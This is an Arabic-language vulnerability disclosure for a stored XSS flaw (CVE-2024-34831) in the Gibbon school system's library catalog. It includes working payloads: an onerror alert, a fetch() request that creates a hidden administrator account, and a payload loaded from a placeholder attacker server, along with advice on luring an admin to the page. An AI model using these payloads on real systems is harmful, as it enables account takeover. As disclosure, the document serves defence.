
الإفصاح عن CVE-2024-34831
Gibbon هو نظام إدارة مدرسي مفتوح المصدر رائع ومتكامل. يُبذل الكثير من الجهد في إعادة هيكلة قاعدة البيانات البرمجية القديمة نسبياً.
المؤلف: Christian Bajada
معامل imageLink عند تحرير/إرسال كتب جديدة (/modules/Library/library_manage_catalog_editProcess.php) يكون عرضة لثغرة XSS. يمكن للمستخدمين الذين لديهم صلاحية إدارة الكتالوج (Manage Catalog) استغلال هذه الثغرة مما يؤدي إلى تنفيذ نصوص برمجية عشوائية لحساب مستخدمين بصلاحيات أعلى وتصعيد الامتيازات.
[http://x](http://x/)" onerror='alert(1)' وسيتم تنفيذ كود التنبيه عند تحميل الصفحة عند فتح صفحة المكتبة:

يشرح هذا القسم كيف يمكن استغلال هذه الثغرة في شيء أكثر خطورة من مجرد نافذة تنبيه (1) بسيطة. سنقوم بخداع مسؤول مسجّل الدخول لإنشاء حساب مسؤول آخر بسلاسة، يمكن للمهاجم الوصول إليه.
حقل imageLink صغير جداً بحيث لا يسمح لنا باستدعاء أي وظيفة ذات معنى على منصة Gibbon. ما يمكننا فعله هو ببساطة استضافة كود Javascript في مكان آخر وتحميله وتنفيذه بواسطة المتصفح. غياب CSP يجعل ذلك ممكناً.
fetch('./modules/User%20Admin/user_manage_addProcess.php', { method: 'POST', body: new URLSearchParams({ title: 'Mr.', surname: 'Cat', firstName: 'Hex', preferredName: 'Hex', 'officialName' : 'Hex', gender: 'M', dob: '01/04/2024', gibbonRoleIDPrimary: '001', username: 'hexthecat', passwordNew: 'Hexed001', passwordConfirm: 'Hexed001', status: 'full', canLogin: 'Y', passwordForceReset: 'Y' }) });
http://books.google.com/books?id=SluXuAAACAAJ&printsec=frontcover&img=1&zoom=1&source=gbs_api" onmouseover="$.getScript('https://<yourserver.com>/payload.js')"
عليك إما الانتظار حتى ينتقل المسؤول إلى كتالوج المكتبة أو إقناعه عبر الرسائل الفورية أو البريد الإلكتروني أو أي قناة أخرى.
تمرير مؤشر الماوس (onmouseover) فوق صورة الكتاب سيتسبب في جلب الحمولة من الموقع (في هذه الحالة <yourserver.com>) وتنفيذها. ينتج عن هذا إنشاء مستخدم مسؤول يمكن للمستخدم الخبيث الوصول إليه الآن. يمكن أيضاً استخدام مستمع 'onerror' لتنفيذ الحمولة فوراً بدلاً من الحاجة إلى تمرير المؤشر فوق الصورة.
يمكنك التحقق من المستخدم الذي تم إنشاؤه من القائمة ADMIN > User Admin

نُشر وفقاً لإرشادات الإفصاح المسؤول https://github.com/GibbonEdu/core/security.